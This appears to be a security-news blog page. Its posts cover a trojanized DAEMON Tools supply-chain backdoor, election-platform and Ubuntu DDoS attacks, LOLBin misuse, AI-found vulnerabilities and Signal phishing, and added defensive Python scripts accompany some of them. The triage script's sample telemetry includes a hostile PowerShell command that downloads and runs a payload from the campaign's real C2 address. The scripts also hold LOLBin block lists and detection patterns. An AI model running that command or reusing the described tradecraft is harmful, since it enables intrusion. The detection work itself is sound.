Showing posts with label Cyber Attacks.

Trojanized DAEMON Tools Used to Deploy Persistent Backdoor Malware


 

A routine software-update mechanism was weaponized to distribute malware through DAEMON Tools' official distribution channel, enabling a stealthy supply-chain compromise. The trojanized builds were signed with AVB Disc Soft's legitimate code-signing certificates, and the operation went undetected for nearly a month.

Because the packages carried valid signatures, they passed conventional trust checks and endpoint security controls without raising immediate suspicion. According to Kaspersky, the campaign began on April 8, 2026 and produced thousands of infections in more than 100 countries before the breach was detected on May 1, 2026.

Almost all infections carried only a first-stage reconnaissance implant that gathers system information and establishes persistence. A comparatively small number of carefully selected victims received a second-stage backdoor, indicating a targeted operation against organizations in Russia, Belarus, and Thailand in the government, science, retail, and manufacturing sectors.

The attackers embedded their malicious framework in several core DAEMON Tools binaries found in the application's installation directory, including DTHelper.exe, DiscSoftBusServiceLite.exe, and DTShellHlp.exe. The malicious code was present in versions 12.5.0.2421 through 12.5.0.2434 and runs at system startup while the application continues to behave normally.

Because the compromised binaries were signed with AVB Disc Soft's authentic signing certificates, the operating system and endpoint security products treated them as trustworthy, lowering the probability of immediate detection. A valid Authenticode signature proves only that the publisher's key signed the file, not that the build itself was clean; when the build or release pipeline is compromised, signature verification passes by design.

When one of the affected binaries runs at system startup, its CRT initialization routine triggers the hidden backdoor, spawning a dedicated background thread that quietly establishes outbound communication with attacker-controlled infrastructure.

The implant repeatedly sent HTTP GET requests to a typosquatted domain that closely mimicked the legitimate DAEMON Tools download portal, blending its beaconing with the software's expected update traffic. WHOIS records show the fraudulent domain was registered on March 27, roughly a week before the supply-chain intrusion began, indicating that the operators prepared their infrastructure in advance.

Analysis of the command-and-control infrastructure showed that compromised systems could receive shell commands executed through cmd.exe and PowerShell, allowing the attackers to download and run additional payloads on demand.

PowerShell's WebClient class was used to retrieve executables from a server at 38.180.107[.]76, run them silently from temporary directories, and delete them afterwards. One of the primary second-stage payloads identified was envchk.exe, a .NET-based information collector built for extensive reconnaissance of infected machines.

Chinese-language strings embedded in the malware suggest that its operators are Chinese speakers, though no attribution to a known threat group has been established. The collector gathers a broad range of host information, including MAC addresses, hostname, DNS domain, installed software, running processes, and system locale.

The collected data is sent to attacker-controlled infrastructure in structured HTTP POST requests, giving the operators a detailed profile of each compromised environment before they decide whether to escalate. Victims were infected simply by downloading and installing the trojanized but validly signed DAEMON Tools installers; the malicious code ran inside trusted application components with no visible sign to the user.

Once active, the implant established persistence that survives reboots and installed a covert backdoor that contacts the remote operators at every system start.

The C2 infrastructure could deliver additional malware stages selectively, based on each victim's profile and operational significance. The first stage therefore functioned primarily as a reconnaissance-oriented information stealer, and the telemetry it harvested was used to assess environments and prioritize victims.

After the first-stage profiling, selected systems were escalated to a second-stage compromise using a lightweight backdoor capable of executing arbitrary commands, downloading files, and running code directly in memory.

In one case, an intrusion at a Russian educational institution was escalated with QUIC RAT, a remote access tool that supports multiple communication protocols and injects its code into legitimate processes to remain stealthy after compromise.

Although it was distributed through official channels, the DAEMON Tools breach remained undetected for nearly a month, making it a highly coordinated and technically mature supply-chain intrusion. Organizations that installed or updated DAEMON Tools on or after April 8 are advised to treat those hosts as potentially compromised: check the installed version against the affected range, and hunt for abnormal process and network activity dating from the compromise window.
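The triage a responder would run across that compromise window, written out as an added example (it is not Kaspersky's tooling or anything from the original post). The indicators are the ones the article gives: the three affected binaries, the 12.5.0.2421 through 12.5.0.2434 version range, the download server 38.180.107[.]76, PowerShell WebClient fetches, and the April 8 start date. The inventory, process-event and proxy-log record layouts are constructed for this example and would need to be mapped onto your own telemetry.

```python
"""Triage helper for the trojanized DAEMON Tools builds described above.

Added example, not from Kaspersky or the original post. Indicators come from
the article; the record layouts below are constructed for the demonstration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

AFFECTED_FILES = {"dthelper.exe", "discsoftbusservicelite.exe", "dtshellhlp.exe"}
AFFECTED_RANGE = ((12, 5, 0, 2421), (12, 5, 0, 2434))
C2_DOWNLOAD_IP = "38.180.107.76"     # written defanged in the article as 38.180.107[.]76
COMPROMISE_START = "2026-04-08"      # ISO dates compare correctly as strings

# PowerShell WebClient download idioms the article attributes to the implant.
WEBCLIENT_RE = re.compile(
    r"(new-object\s+(system\.)?net\.webclient|\.download(file|string)\s*\()", re.I
)


@dataclass(frozen=True)
class Finding:
    host: str
    kind: str
    detail: str


def version_tuple(ver: str) -> tuple[int, ...]:
    return tuple(int(p) for p in ver.strip().split("."))


def version_affected(ver: str) -> bool:
    """True if a DAEMON Tools file version falls inside the trojanized range."""
    lo, hi = AFFECTED_RANGE
    return lo <= version_tuple(ver) <= hi


def check_inventory(records: list[tuple[str, str, str, str]]) -> list[Finding]:
    """records: (host, file name, file version, install date YYYY-MM-DD)."""
    out = []
    for host, fname, ver, installed in records:
        if fname.lower() not in AFFECTED_FILES:
            continue
        if version_affected(ver):
            out.append(Finding(host, "trojanized-build", f"{fname} {ver} installed {installed}"))
        elif installed >= COMPROMISE_START:
            # Version outside the known range but installed in the window: still review it.
            out.append(Finding(host, "installed-in-window", f"{fname} {ver} installed {installed}"))
    return out


def check_process_events(events: list[tuple[str, str, str, str]]) -> list[Finding]:
    """events: (host, parent image, child image, command line)."""
    out = []
    for host, parent, image, cmdline in events:
        child = image.lower().rsplit("\\", 1)[-1]
        parent_name = parent.lower().rsplit("\\", 1)[-1]
        if parent_name in AFFECTED_FILES and child in {"cmd.exe", "powershell.exe"}:
            out.append(Finding(host, "shell-from-daemon-tools", f"{parent_name} -> {child}: {cmdline}"))
        if child == "powershell.exe" and (WEBCLIENT_RE.search(cmdline) or C2_DOWNLOAD_IP in cmdline):
            out.append(Finding(host, "powershell-download", cmdline))
    return out


def check_proxy_log(lines: list[str]) -> list[Finding]:
    """Constructed proxy format: '<timestamp> <host> <method> <url> <status>'."""
    out = []
    for line in lines:
        ts, host, method, url, status = line.split()
        if C2_DOWNLOAD_IP in url:
            out.append(Finding(host, "c2-download-server", f"{ts} {method} {url} {status}"))
    return out


# Constructed sample telemetry (not real logs).
SAMPLE_INVENTORY = [
    ("ws-101", "DTHelper.exe", "12.5.0.2428", "2026-04-12"),
    ("ws-102", "DTHelper.exe", "12.5.0.2419", "2026-03-30"),
    ("ws-103", "DTShellHlp.exe", "12.5.0.2440", "2026-04-20"),
]
SAMPLE_EVENTS = [
    ("ws-101", r"C:\Program Files\DAEMON Tools Lite\DTHelper.exe",
     r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ("ws-101", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
     "'http://38.180.107.76/envchk.exe',\"$env:TEMP\\envchk.exe\")"),
    ("ws-104", r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell Get-Date"),
]
SAMPLE_PROXY = [
    "2026-04-12T09:14:02Z ws-101 GET http://38.180.107.76/envchk.exe 200",
    "2026-04-12T09:14:05Z ws-104 GET https://www.example.com/index.html 200",
]


def run_triage() -> list[Finding]:
    return (check_inventory(SAMPLE_INVENTORY)
            + check_process_events(SAMPLE_EVENTS)
            + check_proxy_log(SAMPLE_PROXY))


if __name__ == "__main__":
    for f in run_triage():
        print(f"{f.host:8} {f.kind:26} {f.detail}")
```

Two of the four checks deliberately ignore the signature: a build in the affected range is flagged whether or not its Authenticode chain validates, and any DAEMON Tools component installed inside the window is surfaced for review even when its version is outside the known-bad range, because the version list is what the investigation found, not necessarily everything the attackers shipped.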

Researchers have not formally attributed the campaign, but the linguistic artifacts in its first stage strongly suggest Chinese-speaking operators. Following earlier compromises involving eScan, Notepad++, and CPU-Z, the incident illustrates the rising trend of software supply-chain attacks in 2026. Parallel campaigns involving Trivy, Checkmarx, and Glassworm, which targeted software repositories, development packages, and browser extensions, show that trusted software ecosystems have become high-value attack surfaces for sophisticated groups.

The DAEMON Tools compromise shows that modern supply-chain attacks are not limited to niche targets or obscure ecosystems but increasingly exploit widely used consumer and enterprise applications. The attackers used legitimate code-signing certificates and official distribution channels to disguise their activity as normal software behavior while quietly gaining access to potentially high-value environments across many countries.

Researchers conclude that organizations must move beyond trust-based models that treat a valid signature as proof of safety, and adopt continuous monitoring, behavioral detection, and software-integrity validation that can surface malicious activity even inside signed, apparently legitimate applications. A single compromised software update can quickly escalate into a global risk with far-reaching operational and national-security consequences.

Election Commission Says ECINET Withstood Over 68 Lakh Cyberattack Attempts During Poll Counting

 



The Election Commission of India (ECI) said its digital election infrastructure faced more than 68 lakh (6.8 million) malicious online hits on the day votes were counted for the recently concluded Assembly elections, with attempts originating from both domestic and overseas sources. According to election officials, the attacks targeted several online systems operated by the Commission, including the public election results portal, but were contained by existing cybersecurity protections.

Officials stated that despite the unusually high volume of hostile traffic, there was no disruption to counting operations or public access to election-related services.

The attacks were directed at ECINET, the Commission’s integrated election management platform that now combines over 40 separate election applications and digital portals into a unified system. The platform is used to manage multiple election-related functions, including monitoring, reporting, voter services, and administrative coordination.

On counting day, May 4, ECINET reportedly processed an average of nearly 3 crore (30 million) hits every minute. Across the polling phases conducted on April 9, 23, and 29, the platform recorded a total traffic load of 98.3 crore (983 million) hits, reflecting the scale at which India's election infrastructure now operates digitally.

The Commission officially launched ECINET in January 2026 after testing its beta version during the Bihar Assembly elections in November 2025. Since then, the application has crossed 10 crore (100 million) downloads, indicating rapid adoption among election officials, staff, and users accessing poll-related information and services.

Election authorities said the platform played a major operational role during the elections across five states and Union Territories, along with bypolls conducted during the same period. According to officials, ECINET enabled real-time monitoring of election activities, accelerated reporting processes, and improved administrative coordination between different election units. Authorities also said the centralized system helped increase transparency by reducing delays in communication and data sharing.

Cybersecurity analysts have repeatedly warned that election infrastructure has become an increasingly attractive target for malicious cyber activity because such systems process large amounts of real-time public information under intense public scrutiny. During counting periods, election portals often experience massive spikes in traffic as citizens, media organizations, and political workers continuously refresh result dashboards. Security researchers note that these high-traffic periods can also create opportunities for malicious actors to disguise harmful requests within normal user activity.

The Election Commission did not disclose the technical nature of the 68 lakh malicious hits. Such traffic typically includes automated bot requests, denial-of-service attempts, vulnerability scanning, and repeated unauthorized access attempts aimed at slowing or overwhelming servers. A count of "hits" measures individual blocked requests rather than distinct attackers or campaigns, so the figure should be read as a volume of hostile traffic, not a number of separate attacks.

The Commission also introduced a QR code-based photo identity verification system for counting centres during the election. On counting day alone, more than 3.2 lakh (320,000) QR codes were generated through ECINET to regulate entry into counting venues. Officials said the system was introduced to ensure that only authorized personnel could enter restricted areas, reducing the possibility of unauthorized access at highly sensitive counting locations.

According to the Commission, this was the first time the QR-based access system had been deployed across all five states and Union Territories simultaneously. The ECI has now decided to adopt the system as a standard security measure for future Lok Sabha and state Assembly elections.

The increasing dependence on centralized digital infrastructure has pushed election management beyond traditional ballot security into the broader domain of cybersecurity, network resilience, identity verification, and real-time system monitoring. As more election operations move onto integrated digital platforms, experts say continuous monitoring and infrastructure hardening will become essential to maintaining uninterrupted electoral processes at national scale.

Ubuntu DDoS Attack Disrupts Installs Updates and Canonical Infrastructure

 

A wave of traffic overwhelmed systems operated by Canonical, the company behind Ubuntu Linux, briefly halting downloads, patches, and web resources. The outage stretched to nearly twenty-four hours, blocking access to essential tools for the duration of the incident.

Midway through the disruption, Canonical confirmed issues affecting its online systems, describing the event as a prolonged international cyber incident. With recovery efforts already underway, the company said progress reports would follow through its official channels as conditions improved.

The impact was not limited to public websites. Reports on unaffiliated Ubuntu forums pointed to failures across several core functions: the security API stalled, repository access broke, installers froze, and package upgrades failed. While the outage lasted, many machines could neither pull patches nor complete clean installs, so the blast radius was wider than first assumed.

A claim of responsibility emerged afterward from a group calling itself The Islamic Cyber Resistance in Iraq 313 Team. Messages attributed to the group on Telegram say it used Beamed, a DDoS-for-hire service, to carry out the attack. Details remain sparse, but the claim points to readily purchasable tools being used for disruption. Services like Beamed rent out flood capacity to anyone willing to pay, with the harm dressed up as "stress testing".

Rather than being used for legitimate load testing, such platforms are routinely turned against web systems to drown them in traffic. With advertised capacity approaching 3.5 terabits per second, extreme volumetric pressure has become a purchasable commodity, and a flood launched from a large pool of hijacked devices can overwhelm infrastructure on its own.

An attack of this kind forces the targeted systems to choke on excess demand and blocks normal access. Legitimate users see delays or complete failures as their requests are lost in the noise, while the compromised machines generate relentless junk traffic instead of useful responses. Once capacity is exceeded, performance collapses and genuine interactions disappear under the artificial congestion.

Botnets of this kind are typically built by planting malware on poorly secured devices, often by abusing weak or default passwords. The infected machines are then bundled into large clusters controlled remotely through online command panels. Access to these botnets changes hands in underground marketplaces, where a short outage can be bought cheaply while sustained, heavier attacks cost more.

Buyers choose between time-limited bursts and longer, sustained surges. DDoS attacks have grown more common as self-propagating malware that exploits weak device protections has spread across countries. Even well-defended networks can be disrupted when attackers pair large bot-driven floods with targeted attack plans.

The Ubuntu incident underscores how fragile key open-source infrastructure has become for the developers, businesses, and public agencies that depend on it worldwide. When update servers or security APIs go offline even briefly, patching halts and system rollouts stall, leaving systems exposed at precisely the moment an attack is underway.

Ubuntu Services Remain Disrupted After DDoS Attack Targets Canonical Infrastructure

 



Several Ubuntu users reported problems installing updates and downloading packages after parts of Canonical’s infrastructure were disrupted during a Distributed Denial of Service (DDoS) attack. Canonical, the company behind the Ubuntu Linux distribution, confirmed that its online systems had been targeted.

In a statement released during the outage, Canonical said its web infrastructure was facing what it described as a sustained cross-border cyberattack and that teams were working to restore affected services. The company added that further updates would be shared through official channels once more information became available.

Discussions across Ubuntu community forums suggested that multiple services were affected during the incident, including Ubuntu’s security API and several Canonical-operated websites. Users also stated that software installations and system updates were temporarily unavailable or failing to complete properly.

Responsibility for the attack was later claimed by a group calling itself “The Islamic Cyber Resistance in Iraq 313 Team.” In Telegram posts attributed to the group, the attackers allegedly said they used a DDoS-for-hire platform known as “Beamed” to carry out the operation.

Beamed is described as a "booter" or "stresser" service, one of the platforms that let customers pay for DDoS attacks. These services are often advertised as tools for testing website traffic capacity, although security researchers have repeatedly linked them to disruptive cyber operations. According to claims associated with the platform, Beamed can generate attacks reaching 3.5 terabits per second, enough traffic to overwhelm major online infrastructure.

A DDoS attack works by flooding a server or network with enormous volumes of internet traffic from large numbers of connected devices at the same time. Once systems become overloaded, legitimate users may no longer be able to access websites, applications, or online services. Unlike ransomware campaigns or data breaches, the primary goal of most DDoS attacks is to interrupt availability rather than steal information directly.

To create these attack networks, threat actors typically compromise internet-connected devices using malware. Weak passwords, exposed systems, outdated software, and poorly secured smart devices are commonly targeted. Once infected, the devices become part of a botnet that can be remotely controlled through centralized management panels.

Access to these botnets is frequently sold through underground marketplaces and subscription-based services. Depending on the size and duration of the attack, prices can range from as little as $10 for lower-powered services to hundreds of dollars per month for larger and more persistent attacks.

The disruption drew attention within the open-source community because Ubuntu infrastructure is widely used across enterprise servers, development environments, cloud systems, and research institutions worldwide. Problems affecting package repositories or security update services can delay software deployments and patch management for organizations that rely on Ubuntu systems daily. Organizations that cannot tolerate that dependency typically run a local mirror or caching proxy (apt-mirror or apt-cacher-ng, for example) so that patch deployment does not hinge on upstream availability during an incident.

The incident also reflects how accessible DDoS-for-hire services have become over the past few years. Platforms offering attack infrastructure continue to reduce the technical barrier required to launch disruptive cyberattacks, allowing even low-skilled actors to rent large-scale attack capabilities for relatively small amounts of money.
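The flow-level triage a network defender would run during an event like the one described in the two Ubuntu posts above, written out as an added example (it is not Canonical's tooling or anything from the original posts). It aggregates NetFlow-style records into fixed windows, learns a packet-rate baseline per destination from a known-clean period, and alerts only when a window's packet rate, source diversity and SYN-only share all jump at once, which is the signature of a rented booter flood rather than an organic traffic spike. The record layout, the thresholds and the sample traffic are assumptions constructed for the demonstration.

```python
"""Flow-level triage for a volumetric flood. Added example, not Canonical's
tooling; the record layout, thresholds and sample traffic are constructed.
"""
from __future__ import annotations

import random
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: int         # epoch seconds
    src: str
    dst: str
    dport: int
    packets: int
    tcp_flags: str  # "S" = SYN only (no handshake completed), "PA" = data


@dataclass(frozen=True)
class Alert:
    window_start: int
    dst: str
    dport: int
    pps: float
    sources: int
    syn_only_share: float


Key = tuple[int, str, int]  # (window start, dst, dport)


def window_stats(flows: list[Flow], window: int) -> dict[Key, dict]:
    """Aggregate packets, flow count, distinct sources and SYN-only flows per window."""
    stats: dict[Key, dict] = defaultdict(
        lambda: {"packets": 0, "flows": 0, "syn_only": 0, "sources": set()})
    for f in flows:
        s = stats[(f.ts - f.ts % window, f.dst, f.dport)]
        s["packets"] += f.packets
        s["flows"] += 1
        s["sources"].add(f.src)
        if f.tcp_flags == "S":
            s["syn_only"] += 1
    return stats


def learn_baseline(clean: list[Flow], window: int) -> dict[tuple[str, int], float]:
    """Mean packets per second per (dst, dport) over a known-clean period."""
    rates: dict[tuple[str, int], list[float]] = defaultdict(list)
    for (_, dst, port), s in window_stats(clean, window).items():
        rates[(dst, port)].append(s["packets"] / window)
    return {k: sum(v) / len(v) for k, v in rates.items()}


def detect(live, baseline, window=10, pps_factor=10.0, min_sources=200, syn_share=0.8):
    """Alert only when rate, source diversity and SYN share all exceed thresholds."""
    alerts = []
    for (start, dst, port), s in sorted(window_stats(live, window).items(), key=lambda kv: kv[0]):
        pps = s["packets"] / window
        share = s["syn_only"] / s["flows"]
        if (pps >= pps_factor * baseline.get((dst, port), 1.0)
                and len(s["sources"]) >= min_sources and share >= syn_share):
            alerts.append(Alert(start, dst, port, pps, len(s["sources"]), round(share, 3)))
    return alerts


def make_sample(seed: int = 7) -> tuple[list[Flow], list[Flow]]:
    """Constructed traffic: 60 s clean, then 30 s clean plus a spoofed SYN flood."""
    rng = random.Random(seed)
    mirror = "203.0.113.10"  # documentation address standing in for an archive mirror

    def organic(t):  # roughly 10 real clients per second completing handshakes
        return [Flow(t, f"198.51.100.{rng.randint(1, 60)}", mirror, 80, rng.randint(5, 15), "PA")
                for _ in range(rng.randint(8, 12))]

    clean = [f for t in range(0, 60) for f in organic(t)]
    live = []
    for t in range(60, 90):
        live += organic(t)
        live += [Flow(t, f"10.{rng.randint(0, 255)}.{rng.randint(0, 255)}.{rng.randint(1, 254)}",
                      mirror, 80, 1, "S") for _ in range(1500)]  # 1500 spoofed SYNs per second
    return clean, live


def run_detection() -> list[Alert]:
    clean, live = make_sample()
    baseline = learn_baseline(clean, window=10)
    return detect(live, baseline, window=10)


if __name__ == "__main__":
    for a in run_detection():
        print(f"t={a.window_start:<4} {a.dst}:{a.dport} {a.pps:.0f} pps "
              f"{a.sources} sources syn-only {a.syn_only_share:.1%}")
```

Requiring all three signals together is what keeps a legitimate surge (a point release landing, with many real clients completing handshakes) from tripping the rule, while a flood from spoofed sources that never complete the handshake is caught in the first window it appears in.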

Trusted Tools Becoming the New Cybersecurity Threat, Says Bitdefender Report

 

Cybersecurity threats are evolving rapidly, and according to recent findings, attackers are increasingly relying on tools that organizations already trust. In its latest analysis, Bitdefender highlighted that modern cyberattacks often resemble routine administrative activity rather than traditional malware-based intrusions.

In the report titled "Your Biggest Security Risk Isn't Malware — It's What You Already Trust," Bitdefender explained how commonly used utilities such as PowerShell, WMIC, netsh, certutil, and MSBuild have become popular with attackers. These tools are used daily by IT teams for legitimate purposes, which makes their malicious use hard to distinguish from administration. The company found legitimate-tool misuse in 84% of the 700,000 high-severity incidents it analyzed.

To help organizations address this growing concern, Bitdefender introduced a complimentary Internal Attack Surface Assessment program. Designed for companies with 250 or more employees, the 45-day assessment aims to identify risky tools, users, and endpoints that could potentially be exploited by attackers while ensuring normal business operations remain unaffected.

The company noted that a standard Windows 11 installation includes 133 unique living-off-the-land binaries (LOLBins) across 987 instances. In addition, Bitdefender Labs found that PowerShell was active on 73% of endpoints, often running silently through third-party applications. According to the report, this indicates that the issue is less about malware and more about excessive permissions and unrestricted tool access.

Industry trends also point toward a shift in cybersecurity strategy. Gartner predicts that preemptive cybersecurity measures will account for 50% of IT security spending by 2030, compared to less than 5% in 2024. It also forecasts that 60% of large enterprises will adopt dynamic attack surface reduction technologies by 2030, up from less than 10% in 2025.

The Internal Attack Surface Assessment operates in four phases over approximately 45 days using GravityZone PHASR, Bitdefender’s proactive hardening and attack surface reduction technology.

The process begins with behavioral learning, where PHASR studies activity patterns for each machine-user combination over roughly 30 days. Organizations then receive an Attack Surface Dashboard featuring an exposure score between 0 and 100, along with prioritized findings related to living-off-the-land binaries, remote administration tools, tampering utilities, cryptominers, and piracy software.

An optional reduction phase allows businesses to apply restrictions either manually or through PHASR’s Autopilot feature. Employees can request restored access through a built-in one-click approval system. The final review measures how much the organization’s attack surface has been reduced and identifies any unauthorized applications or shadow IT risks discovered during the process.
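The learning, scoring and reduction phases described above, reduced to their essentials as an added example (this is not Bitdefender or GravityZone PHASR code). It learns which LOLBins each (host, user) principal actually ran during a learning window, derives a per-principal block list from everything that principal never used, scores exposure before and after, and flags post-learning executions that fall outside the baseline. The 30-day window comes from the article; the exposure formula, the LOLBin list beyond the five tools the article names, and the Sysmon-style event layout are assumptions constructed for the demonstration.

```python
"""Per-principal LOLBin baselining and reduction. Added example, not
Bitdefender/PHASR code; formula, event layout and extra LOLBins are assumed.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass

# The five utilities named in the article plus five more that appear in the
# same playbooks (an assumption for the example, not from the report).
LOLBINS = {
    "powershell.exe", "wmic.exe", "netsh.exe", "certutil.exe", "msbuild.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "bitsadmin.exe", "cscript.exe",
}
LEARNING_DAYS = 30  # the article describes roughly 30 days of behavioral learning

Principal = tuple[str, str]  # (host, user)


@dataclass(frozen=True)
class Event:
    day: int      # days since the start of the assessment
    host: str
    user: str
    image: str    # full path of the created process


def lolbin_name(image: str) -> str | None:
    name = image.lower().rsplit("\\", 1)[-1]
    return name if name in LOLBINS else None


def learn_baseline(events: list[Event]) -> dict[Principal, set[str]]:
    """Which LOLBins each (host, user) actually used during the learning window."""
    baseline: dict[Principal, set[str]] = defaultdict(set)
    for e in events:
        if e.day < LEARNING_DAYS and (name := lolbin_name(e.image)):
            baseline[(e.host, e.user)].add(name)
    return dict(baseline)


def reduction_policy(principals, baseline) -> dict[Principal, set[str]]:
    """Block list per principal: every LOLBin that principal never used."""
    return {p: LOLBINS - baseline.get(p, set()) for p in principals}


def flag_post_learning(events, baseline) -> list[Event]:
    """Executions after the learning window that fall outside the baseline."""
    return [
        e for e in events
        if e.day >= LEARNING_DAYS
        and (name := lolbin_name(e.image)) is not None
        and name not in baseline.get((e.host, e.user), set())
    ]


def exposure_score(principals, allowed: dict[Principal, set[str]]) -> float:
    """0-100: share of (principal, LOLBin) pairs still permitted to execute."""
    permitted = sum(len(allowed.get(p, set())) for p in principals)
    return round(100.0 * permitted / (len(principals) * len(LOLBINS)), 1)


# Constructed sample telemetry (not real logs).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
S32 = r"C:\Windows\System32"
PRINCIPALS: list[Principal] = [("srv-01", "admin"), ("ws-01", "alice"), ("ws-02", "bob")]
EVENTS: list[Event] = []
for day in range(LEARNING_DAYS):
    EVENTS += [Event(day, "srv-01", "admin", PS),
               Event(day, "srv-01", "admin", S32 + r"\wbem\wmic.exe"),
               Event(day, "srv-01", "admin", S32 + r"\netsh.exe"),
               Event(day, "ws-01", "alice", PS),  # launched silently by a vendor app
               Event(day, "ws-02", "bob", r"C:\Program Files\Office\winword.exe")]
EVENTS += [Event(31, "ws-01", "alice", PS),                    # in alice's baseline
           Event(31, "ws-01", "alice", S32 + r"\mshta.exe"),   # new for alice
           Event(32, "ws-02", "bob", S32 + r"\certutil.exe"),  # bob never used a LOLBin
           Event(32, "srv-01", "admin", S32 + r"\wbem\wmic.exe")]  # in admin's baseline


def run_assessment() -> dict[str, object]:
    baseline = learn_baseline(EVENTS)
    before = {p: set(LOLBINS) for p in PRINCIPALS}  # nothing restricted yet
    return {
        "score_before": exposure_score(PRINCIPALS, before),
        "score_after": exposure_score(PRINCIPALS, baseline),
        "blocked": reduction_policy(PRINCIPALS, baseline),
        "flagged": flag_post_learning(EVENTS, baseline),
    }


if __name__ == "__main__":
    r = run_assessment()
    print(f"exposure before {r['score_before']} after {r['score_after']}")
    for e in r["flagged"]:
        print(f"day {e.day}: {e.user}@{e.host} ran {lolbin_name(e.image)} outside baseline")
```

The point the sample makes is the one the article makes: the administrator who genuinely needs PowerShell, WMIC and netsh keeps them, the workstation whose vendor application drives PowerShell keeps only that, and the user who never touched a LOLBin loses all ten, so a certutil download on that machine is both blocked by policy and visible as an anomaly. The one-click restore the article mentions maps onto adding a name back to that principal's baseline set.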

Bitdefender stated that some early-access customers managed to reduce their attack surface by more than 30% within the first month, while one organization reportedly achieved nearly 70% reduction after restricting LOLBins and remote administration tools.

The assessment is intended to benefit multiple stakeholders within an organization. CISOs receive measurable exposure data suitable for board-level reporting, while SOC teams and IT administrators can potentially reduce investigation workloads by eliminating unnecessary suspicious activity. Business leaders may also benefit from documented security improvements that align with regulatory, auditing, and cyber-insurance expectations.

Bitdefender concluded that security risk is no longer solely an external threat but often lives in the existing systems and trusted tools already present in enterprise environments.

AI-Driven Cyberattacks and Global Cybersecurity Shortages Raise Fears of an AI Bugocalypse

 

Artificial intelligence is rapidly transforming cyber warfare, with experts warning the world may already be entering an “AI bugocalypse.” Modern AI systems can identify hidden software flaws and weaponize them within hours — sometimes before vulnerabilities are even publicly disclosed. 

At the same time, a growing shortage of cybersecurity professionals is leaving governments, businesses, hospitals, and critical infrastructure increasingly exposed. Concerns intensified after Anthropic introduced Mythos Preview, an advanced AI model reportedly capable of finding thousands of vulnerabilities across major operating systems and web browsers. 

While about 40 organizations received early access to strengthen their defenses, most governments and smaller institutions remain without similar protection. Security researchers warn this imbalance is becoming dangerous. Wealthier organizations can patch systems quickly using advanced AI tools, while smaller entities struggle to keep pace. Because global digital infrastructure is tightly connected, a single weak point can trigger disruptions across banks, utilities, supply chains, and government systems. 

AI-powered attacks are accelerating worldwide. CrowdStrike reported an 89% rise in AI-enabled cyber incidents during 2025. Criminal groups now use AI to create phishing emails, deepfake audio, fake videos, malware, and automated attack programs. Even inexperienced attackers can launch complex cyber operations using publicly available AI platforms. Attack timelines have also collapsed dramatically. 

In 2018, organizations often had years between a vulnerability becoming known and hackers exploiting it. By 2024, that window had fallen to only a few hours, with some attacks occurring before official disclosures were even released. Experts say AI tools can now reverse-engineer software patches almost instantly, identify what flaw developers fixed, and generate working exploit code within minutes. 

Once created, those attacks can spread globally before many organizations even install the update. Critical infrastructure is increasingly at risk as well. Hospitals, schools, public agencies, power systems, and water networks have all become targets. Cyberattacks linked to Iran recently disrupted organizations across the Middle East, while fraud networks in Southeast Asia reportedly used AI tools to steal massive sums from victims in Europe and the United States. 

Meanwhile, the global shortage of cybersecurity professionals continues to grow, especially across heavily targeted Asia-Pacific regions. Experts warn companies can no longer rely solely on patching vulnerabilities after attacks begin. Instead, organizations must prepare for breaches in advance through stronger defenses, backups, response plans, and resilient system design. 

Even AI developers acknowledge no single company can solve the crisis alone. Researchers, governments, software firms, and cybersecurity teams worldwide will need deeper cooperation as AI-driven threats continue evolving. Specialists increasingly argue that cybersecurity must be treated as an essential global priority rather than a luxury available only to organizations with major resources.

Signal Plans New Security Measures After Russian Hackers Hijack Hundreds of Accounts

 

Signal is moving to strengthen its defenses after revelations that hackers tied to the Russian government hijacked numerous German users' accounts through targeted phishing. The service's end-to-end encryption was not broken; the attacks manipulated people rather than systems, which is what alarms experts. Reports suggest around 300 people in Germany were affected, among them prominent politicians, including the head of the German parliament. The victim list shows a deliberate shift toward targeting officials, campaigners, and public figures rather than opportunistic attacks. Nothing in Signal's core security was breached and its cryptography held throughout; the attackers simply went around it with deceptive messages aimed directly at users.

Those messages persuaded some users to hand over their login details without realizing it, while the app and its built-in privacy safeguards remained untouched. The messages reportedly posed as "Signal Support" and arrived directly in users' inboxes. Rather than ignoring them, some recipients gave up their one-time registration codes, their Signal PINs, and their account backup information.

With those details, the intruders registered the targeted accounts on devices they controlled, gaining full access to private conversations. Security experts across Europe and U.S. agencies including the FBI had warned about such tactics earlier, and phishing campaigns of this pattern have drawn attention because of their repeated appearance.

Reported targets have also included individuals who speak out against China's policies, a consistency of technique that points to coordinated, state-backed surveillance rather than random attacks. What distinguishes these intrusions from conventional hacks of code flaws is that human behavior is the attack surface.

Instead of breaking software defenses, the intruders gain access by persuading people to disclose credentials; once entry is granted through trust rather than force, encryption offers no resistance, because the attacker's device is now a legitimate member of the account. Analysts observe that tricking people now works better than defeating technical barriers, and what once required complex tooling now succeeds with a conversation. Signal says it is working on new protections to make such scams easier for users to spot.

Without giving specifics, the team said the updates target phishing-driven account takeovers and will begin appearing within weeks, with the aim of reducing how often accounts are compromised through deceptive messages. Signal's strong privacy guarantees, however, limit how much it can see.

Because messages are end-to-end encrypted, chats are hidden even from the service itself, and its minimal collection of usage data leaves it little telemetry with which to investigate scam attempts. Signal has since reminded users that genuine support staff will never contact them inside the app, on social media, by text, or by phone to ask for login details, verification codes, or personal identifiers.

Official communication comes only from confirmed accounts ending in @signal.org, with no exceptions. Despite strong encryption, takeovers through stolen credentials show that the human layer remains the weak point. Signal's Registration Lock ties re-registration of a phone number to the account PIN, which is exactly why the attackers asked for PINs as well as one-time codes; enabling it and never sharing the PIN closes the path these attacks used. As scams become harder to spot, specialists stress vigilance alongside such controls: protection depends on behavior, not code alone.

Canvas Learning Platform Outage Disrupts Universities After ShinyHunters Cyberattack

 

